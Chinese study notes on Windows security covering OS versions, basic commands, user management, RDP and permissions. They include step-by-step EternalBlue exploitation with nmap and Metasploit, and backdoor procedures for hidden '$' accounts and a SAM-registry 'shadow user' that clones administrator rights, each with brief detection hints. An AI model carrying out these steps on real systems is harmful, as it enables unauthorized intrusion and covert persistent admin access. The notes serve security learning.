Windows操作系统安全

0 阅读5分钟

免责声明:本笔记中涉及的攻击手法、漏洞利用、流量分析等技术,仅作为网络安全防御、应急响应及合规审计的学习参考,严禁用于任何未经授权的网络渗透、数据窃取、系统破坏或其他恶意行为。

初识操作系统

操作系统是管理和控制计算机硬件与软件资源的计算机程序,是直接运行在“裸机”上的最基本的系统软件,任何其他软件都必须在操作系统的支持下运行

操作系统的分类

Windows

简介:Windows是微软公司研发的操作系统

核心特点:微软研发,图形界⾯友好,兼容性强

应用场景:企业服务器、个⼈办公电脑、专⽤⼯业设备

Linux

简介:Linux是一种自由和开放源代码的类Unix操作系统,由林纳斯托瓦兹于1991年首次发布

核心特点:⾃由开源,稳定性⾼,安全性强

应用场景:服务器、嵌⼊式设备、渗透测试环境

macOS

简介:macOS

核心特点:苹果专有,⽣态闭环,⽤户体验佳

应用场景:设计师、开发者⼯作站

Windows历史与发展

Microsoft Windows是美国微软公司以图形用户界面为基础研发的操作系统,主要运用于计算机、智能手机等设备,共有普通版本、服务器版本(Windows Server)、手机版本(Windows Phone等)、嵌入式版本(Windows CE等)等子系列,是全球应用最广泛的操作系统之一

个人设备

⽼旧个⼈设备系统(⾼漏洞⻛险)

代表版本:Windows 7(2009年发布,已停⽌官⽅⽀持)

应⽤场景:制造业 CNC 设备控制、医疗影像终端、⽼旧办公电脑

渗透关注点:系统漏洞多、默认防御弱,易成为内⽹突破的⼊⼝

现代个⼈设备系统(防御强化)

代表版本:Windows 10(2015年发布)、Windows 11(2021年发布)

应⽤场景:企业办公终端(搭配 BitLocker 加密+Intune 管理)、开发者⼯作站(⽀持

WSL2+Hyper-V)

渗透关注点:需突破硬件级防护(如 TPM 2.0)与⾏为检测机制,攻击难度显著提升

服务器系统(⾼价值攻击⽬标)

代表版本:Windows Server 2008/2012/2016/2019/2022

应⽤场景:企业内⽹⽂件服务器、数据库服务器、Web 服务器、域控制器

渗透关注点:掌握服务器核⼼服务(如 SMB、RDP、IIS)的配置漏洞,是获取内⽹控制权的关键

命令提示窗口:win+r cmd

Windows常用指令

  1. dir:查看路径
  2. 切换盘符命令:盘符+冒号
  3. cd:进入指定文件夹
  4. cd ..:返回上一级文件夹
  5. cls:清空窗口内容
  6. ipconfig:显示网络信息

Windows 系统服务安全

永恒之蓝

爆发时间:2017年4⽉披露,2017年5⽉衍⽣出 Wannacry 勒索病毒全球爆发

影响范围:波及全球学校、企业、政府机构,病毒加密⽤户⽂件后要求⽀付⽐特币赎⾦才能恢复

漏洞原理:利⽤ Windows SMB v1 协议的漏洞,⽆需⽤户交互即可远程执⾏恶意代码

前提:已知服务器的ip地址

攻击机:kali--利用msf

扫描目标主机是否存在该漏洞

  1. nmap --script smb-vuln* 192.168.157.130
  2. 看输出结果445是否open 结果是否为VULNERABLE
  3. 启动 msfconsole
  4. search ms17-010 查找模块
  5. use 0 使用模块
  6. set设置 rhost目标主机 IP地址
  7. run 开始攻击
  8. 输出结果是否为win

Windows用户与组管理

账户类型与权限等级

1.system:系统内置,最大的权限,系统本身

2.管理员账户(Administrator):拥有系统完全控制权限,可修改系统配置、安装软件、管理其他⽤户

3.标准⽤户账户:仅拥有⾃身⽂件操作和部分软件使⽤权限,⽆法修改系统核⼼配置

4.来宾账户(Guest):权限最低,仅能浏览部分⽂件,默认禁⽤

用户组

把用户统一管理

管理员账户组(Administrators):组内用户拥有管理员的权限

查看本地用户和组

开始菜单 计算机右键 管理 本地用户和组 用户

Windows 用户命令

net user:查看本机用户

net user gaga /del:删除用户

net user gaga 123456 /add:添加用户

net user gaga :查看用户详细信息

net localgroup administrators gaga /add:将用户添加到指定组

Windows远程RDP连接

前提:

1.两台电脑(控制端、被控制端)必须处于同⼀⽹络(⽐如连同⼀个 WiFi、同⼀个路由器,或都接⼊公司内⽹),⽹络能正常连通,不能断⽹。

2.被控制的电脑(要被远程的那台),必须开启 “远程桌⾯” 功能(默认关闭,需⼿动设置开启,允许其他电脑远程控制它)

方法:计算机 属性 远程设置 远程 允许运行计算机连接 应用 确定

3.被控制电脑需有可登录的 Windows 账号和密码(账号需有远程访问权限,没有密码或权限不够,⽆法成功连接)

4.控制端电脑(操作的那台),需知道被控制电脑的IP 地址(可通过前⾯学的 ipconfig 命令查询),或同⼀⽹络下的电脑名称,才能定位并连接。

文件权限

  1. 文件属性
  2. 安全
  3. 将用户权限更改

管理员组内的用户不等于管理员

cmd管理员运行(system)

uac默认三等级 管理员组(除管理员)不能使用

一等级 管理员用户组能使用

后门

隐藏用户:net user gaga$ 123456 /add

排查:计算机管理 本地用户和组 用户

影子用户

使用gaga的密码但是管理员的权限

1.win+r regedit

2.HKEY_LOCAL_MACHINE\SAM\SAM,右键「SAM」→「权限」→ 勾选当前⽤户

的「完全控制」→「确定」

3.SAM\Domains\Account\Users\Names,找到administrator,找到他的权限数值

4.导出用户gaga的名字和数值

5.导出administrator的权限

6.点击「gaga$」对应的数值名称,将右侧「F」键值替换为步骤4复制的管理员「F」键值

7.导出该注册表项(⽂件→导出),然后删除 gaga⽤户:netusergaga ⽤户: net user gaga /delete

排查:查看注册表用户路径;重启计算机

因为个人水平有限,文中肯定有不少值得商榷和改进的地方。所以想把它分享出来,真诚地向大家请教:无论是逻辑上的漏洞、观点上的偏差,还是行文上的问题,都欢迎大家多多指点。期待能在大家的帮助下,把内容打磨得更好,感谢!